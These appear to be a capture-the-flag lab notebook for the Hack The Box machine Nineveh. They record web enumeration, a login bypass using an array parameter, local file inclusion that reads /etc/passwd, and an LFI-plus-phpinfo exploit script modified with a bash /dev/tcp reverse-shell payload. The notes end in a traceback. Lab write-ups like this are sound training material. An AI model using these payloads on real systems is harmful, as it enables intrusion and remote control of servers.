2 :80

:80 :443 in parallel 

http://nineveh.htb/
It works!
| splash page

$ gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 100
===============================================================
/info.php             (Status: 200) [Size: 83687]
/index.html           (Status: 200) [Size: 178]
/department           (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]

http://nineveh.htb/info.php
PHP Version 7.0.18-0ubuntu0.16.04.1
System 	Linux nineveh 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 
Loaded Configuration File 	/etc/php/7.0/apache2/php.ini 
Server Root 	/etc/apache2 
DOCUMENT_ROOT 	/var/www/html 
file_uploads	On

http://nineveh.htb/department/ > http://nineveh.htb/department/login.php
login page
# view-source
<!-- @admin! MySQL is been installed.. please fix the login page! ~amrois -->

$ gobuster dir -u http://nineveh.htb/department/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 100
===============================================================
/header.php           (Status: 200) [Size: 670]
/footer.php           (Status: 200) [Size: 51]
/files                (Status: 301) [Size: 321] [--> http://nineveh.htb/department/files/]
/login.php            (Status: 200) [Size: 1560]
/index.php            (Status: 200) [Size: 68]
/css                  (Status: 301) [Size: 319] [--> http://nineveh.htb/department/css/]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/manage.php           (Status: 302) [Size: 0] [--> login.php]
# all redirect to login.php

# default admin:admin fails
# but user enum is possible

admin:admin => Invalid Password!
amrois:amrois => invalid username

# tried auth-bypass/sqli.txt  - nothing.
# tried manual sqli to find columns - nothing.
# tried changing in burp password=password => password[]=
# works > http://nineveh.htb/department/manage.php

http://nineveh.htb/department/manage.php
logged in as admin
| notes section

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt
Have you fixed the login page yet! hardcoded username and password is really bad idea!
check your serect folder to get in! figure it out! this is your challenge
Improve the db interface.
~amrois
# failed LFI using http://nineveh.htb/department/manage.php?notes=../../../../../../etc/passwd
# failed LFI http://nineveh.htb/department/manage.php?notes=files/../../../etc/passwd

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes/etc/passwd
Warning:  include(files/ninevehNotes/etc/passwd): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31

# we are in /var/www/html/department
# no such file or directory 
# removing ninevehnotes/
http://nineveh.htb/department/manage.php?notes=files/../../../../etc/passwd
No Note is selected

# error was good so adding ninevehnotes and removing files/
# we get LFI
http://nineveh.htb/department/manage.php?notes=/ninevehNotes.txt/../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash

# also works http://nineveh.htb/department/manage.php?notes=/ninevehNotes.txt/../etc/passwd

# as fileUpload is On, testing LFI+PHPINFO = RCE.

# capturing info.php via burp
# changing GET, Content-Type and data

POST /info.php HTTP/1.1
Host: nineveh.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=mq5puchlsho4m8r1u0q2m3tl30
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------7db268605ae
Content-Length: 194

-----------------------------7db268605ae
Content-Disposition: form-data; name="dummyname"; filename="test.txt" Content-Type: text/plainSecurity
Test
-----------------------------7db268605ae

# response
<h2>PHP Variables</h2>
<table>
<tr class="h"><th>Variable</th><th>Value</th></tr>
<tr><td class="e">$_FILES['dummyname']</td><td class="v"><pre>Array
(
    [name] =&gt; test.txt
    [type] =&gt; 
    [tmp_name] =&gt; 
    [error] =&gt; 3
    [size] =&gt; 0
)

# no tmp_name? weird?

# still running exploit to check

# added on top
local_ip="10.10.16.7"
local_port=443
phpsessid="mq5puchlsho4m8r1u0q2m3tl30"

# modified payload
PAYLOAD="""%s\r <?php system("bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'");?>\r""" % (TAG, local_ip, local_port)

# modified request location and added Cookie
REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
Cookie: PHPSESSID=mq5puchlsho4m8r1u0q2m3tl30; othercookie="""+padding+"""\r

# modified LFIREQ; added cookie as we need to be logged in to access that page
LFIREQ="""GET /department/manage.php?notes=/ninevehNotes/..%s HTTP/1.1\r
Cookie: PHPSESSID=mq5puchlsho4m8r1u0q2m3tl30\r

# changed => to =&gt (notes)

$ python phpinfolfi.py 10.10.10.43 80 100                                                                                                                                                                                             130 ⨯
Don't forget to modify the LFI URL
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... Traceback (most recent call last):
  File "phpinfolfi.py", line 201, in <module>
    main()
  File "phpinfolfi.py", line 161, in main
    offset = getOffset(host, port, reqphp)
  File "phpinfolfi.py", line 120, in getOffset
    raise ValueError("No php tmp_name in phpinfo output")
ValueError: No php tmp_name in phpinfo output

Last updated